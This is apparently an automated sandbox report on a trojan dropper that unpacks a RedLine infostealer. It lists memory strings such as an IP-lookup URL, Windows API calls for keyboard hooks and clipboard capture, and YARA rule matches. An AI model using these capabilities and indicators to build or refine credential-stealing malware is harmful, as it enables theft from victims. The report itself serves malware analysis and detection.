Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: Rarissima.exe.pif, 0000000A.00000000.1174784742.0000000000A19000.00000002.00000001.01000000.00000006.sdmp, Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Rarissima.exe.pif, 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Rarissima.exe.pif.4.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Code function: 0_2_004073A6 SetWindowsHookExW 00000002,Function_00007377,00000000,00000000

0_2_004073A6

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009C4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

10_2_009C4632

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009C4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

10_2_009C4830

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

10_2_009C4632

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009B0508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

10_2_009B0508

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009DD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

10_2_009DD164

System Summary

Malicious sample detected (through community Yara rule)

Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009B42D5: CreateFileW,DeviceIoControl,CloseHandle,

10_2_009B42D5

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009A8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

10_2_009A8F2E

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009B5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

10_2_009B5778

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00404AEB	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_0040F8A3	0_2_0040F8A3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00414A33	0_2_00414A33
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_0041237F	0_2_0041237F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_004146C1	0_2_004146C1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_0041479B	0_2_0041479B
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0095B020	10_2_0095B020
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009594E0	10_2_009594E0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_00959C80	10_2_00959C80
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009723F5	10_2_009723F5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009D8400	10_2_009D8400
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_00986502	10_2_00986502
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0095E6F0	10_2_0095E6F0
